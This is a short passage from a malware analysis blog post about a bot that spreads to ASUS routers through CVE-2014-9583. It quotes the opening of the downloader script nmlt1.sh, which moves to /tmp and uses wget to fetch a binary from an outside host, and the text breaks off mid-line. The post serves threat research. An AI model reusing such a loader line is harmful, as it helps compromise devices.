In the post "Home Routers - New Favorite of Cybercriminals in 2016", we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers.

The following figure shows attack traffic captured through Wireshark.

Figure 1: Exploitation of CVE-2014-9583

Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.

    #!/bin/sh
    cd /tmp
    rm -f .nttpd
    wget -O .nttpd http://stuf.in/begh0Array ...
